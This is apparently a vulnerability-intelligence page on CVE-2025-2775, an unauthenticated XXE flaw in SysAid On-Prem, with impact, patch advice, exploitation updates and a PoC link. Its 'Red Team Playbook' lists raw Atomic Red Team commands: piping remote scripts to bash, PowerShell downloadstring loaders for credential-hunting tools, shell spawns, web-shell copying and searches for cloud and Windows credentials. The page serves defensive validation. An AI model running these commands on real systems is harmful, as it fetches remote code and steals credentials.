CVE-2025-2775
Overview
This vulnerability is an unauthenticated XML External Entity (XXE) injection affecting the Checkin processing functionality of SysAid On-Prem versions up to 23.3.40. The root cause is improper parsing of XML input that allows external entity references to be processed, enabling attackers to manipulate XML payloads. The affected component is the POST /mdm/checkin endpoint, which fails to securely handle XML input, leading to exposure of internal resources.
Vulnerability Description
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives.
Impact
An attacker can exploit this vulnerability without any authentication or user interaction to read arbitrary files on the server and perform administrator account takeover. This leads to full system compromise, enabling unauthorized access to sensitive data and administrative controls. The vulnerability allows attackers to escalate privileges and potentially disrupt or control the affected SysAid On-Prem instance, impacting business operations and data confidentiality.
Solution
SysAid has released patches addressing this vulnerability in versions above 23.3.40. Administrators should upgrade to the latest version as detailed in the vendor advisory at https://documentation.sysaid.com/docs/24-40-60. The advisory provides specific instructions for applying updates to the On-Prem product. No alternative workarounds are documented; timely patching is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question pertains to an unauthenticated XML External Entity (XXE) issue found in specific versions of the SysAid On-Prem software. This flaw arises from improper handling of XML input during the Checkin processing functionality, which allows an attacker to manipulate XML data to access sensitive files or even execute commands on the server. By exploiting this vulnerability, an attacker can potentially read arbitrary files on the server, leading to the exposure of sensitive information, such as configuration files or user credentials. Furthermore, the ability to perform XXE attacks can enable an adversary to escalate privileges, particularly targeting administrator accounts, thereby compromising the entire system.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit the flaw. An unauthenticated user can craft a malicious XML payload and submit it to the vulnerable endpoint. This payload can include references to external entities, allowing the attacker to read files from the server or even execute remote requests. For instance, an attacker could retrieve sensitive files such as password databases or configuration files, which could then be used to further compromise the system or gain unauthorized access to other connected systems. Additionally, if the attacker successfully gains administrative access, they can manipulate the system settings, install malware, or exfiltrate sensitive data, significantly increasing the potential damage.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on SysAid for IT service management. The risk extends beyond mere data exposure; it encompasses potential operational disruptions, reputational damage, and financial losses. Organizations may face regulatory scrutiny if sensitive data is compromised, leading to legal ramifications and loss of customer trust. The ability for an attacker to take over administrator accounts means that the entire IT infrastructure could be at risk, allowing for further exploitation or lateral movement within the network. This vulnerability not only threatens the integrity of the affected systems but also poses a broader risk to the organization’s overall cybersecurity posture.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Firstly, regular vulnerability assessments and penetration testing should be conducted to identify and remediate such weaknesses proactively. Employing web application firewalls (WAF) can help filter out malicious XML payloads before they reach the application. Additionally, organizations should ensure that they are using the latest versions of SysAid, as updates often include patches for known vulnerabilities. It is also advisable to implement strict input validation and sanitization practices to prevent the processing of malicious XML data. Furthermore, monitoring and logging access to sensitive files can help detect unusual activity that may indicate exploitation attempts.
In conclusion, the unauthenticated XML External Entity vulnerability in SysAid On-Prem poses significant risks to organizations, allowing attackers to gain unauthorized access and potentially compromise sensitive information. The ease of exploitation and the severe consequences of a successful attack necessitate immediate attention and action from affected organizations. By adopting robust detection and mitigation strategies, businesses can safeguard their systems against this and similar vulnerabilities, thereby enhancing their overall security posture and resilience against cyber threats.
CSURFACE threat intelligence has observed a slight increase in exploitation attempts targeting the CVE-2025-2775 vulnerability in SysAid On-Prem, reflected by a modest uptick in detection activity across our sensors. Despite this, the Exploit Prediction Scoring System (EPSS) score has decreased, indicating a reduced likelihood of widespread exploitation in the immediate term. The emergence of new proof-of-concept exploits consolidates attacker capabilities, underscoring the vulnerability’s persistence as a viable attack vector. This nuanced shift suggests that while adversaries are actively probing and refining exploitation techniques, large-scale campaigns have not yet materialized. Defenders should remain vigilant given the continued presence of active exploitation attempts and the availability of public exploit code, which lowers the barrier for threat actors to weaponize this vulnerability. Overall, the threat level remains high due to the vulnerability’s critical impact potential, but the current exploitation momentum appears to be stabilizing rather than accelerating.
Update 2 — June 22, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-2775, reflected by a notable surge in telemetry signals from our sensors. This increase indicates that threat actors are intensifying their probing and exploitation efforts against vulnerable SysAid On-Prem installations. The presence of a recently published proof-of-concept exploit chain combining multiple related CVEs has likely lowered the technical barrier for adversaries, facilitating more frequent and sophisticated attack attempts. Although the EPSS score shows a slight decline in short-term trend, the overall exploitability remains high given the critical impact of administrator account takeover and file disclosure capabilities. This evolving activity underscores the vulnerability’s sustained attractiveness to attackers and suggests that opportunistic exploitation could soon escalate into more widespread campaigns. Defenders should consider this development a clear signal of heightened risk, as the expanded exploitation footprint increases the likelihood of successful compromises in unpatched environments.
Update 3 — July 09, 2026
CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting CVE-2025-2775, reflecting a slight upward trend in attacker interest despite a marginal decline in the EPSS score. This subtle rise in activity, coupled with the recent inclusion of the vulnerability in the KEV catalog, signals sustained adversary focus on leveraging the unauthenticated XML External Entity flaw to achieve administrator account takeover and sensitive file access. Additionally, the emergence of new proof-of-concept exploit chains that combine multiple related CVEs underscores the growing sophistication of attack methods. While the short-term exploitability metric shows a minor decrease, the overall risk remains elevated due to the critical impact and expanding exploitation footprint. Defenders should interpret this development as an indication that exploitation attempts are persistent and may intensify, increasing the likelihood of successful intrusions in environments lacking timely patching.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sysaid | Sysaid | All |
cpe:2.3:a:sysaid:sysaid:*:*:*:*:on-premises:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/watchTowr-vs-SysAid-PreAuth-RCE-Chain
PoC for SysAid PreAuth RCE Chain (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)
|
watchtowrlabs | 12 | 6 | 2025-03-28 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-221 | Data Serialization External Entities Blowup |
34%
|
— | — |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-2775 |
| documentation.sysaid.com |
GitHub CVE
vendor-advisory
|
https://documentation.sysaid.com/docs/24-40-60 |
| labs.watchtowr.com |
GitHub CVE
exploit
|
https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-2775 |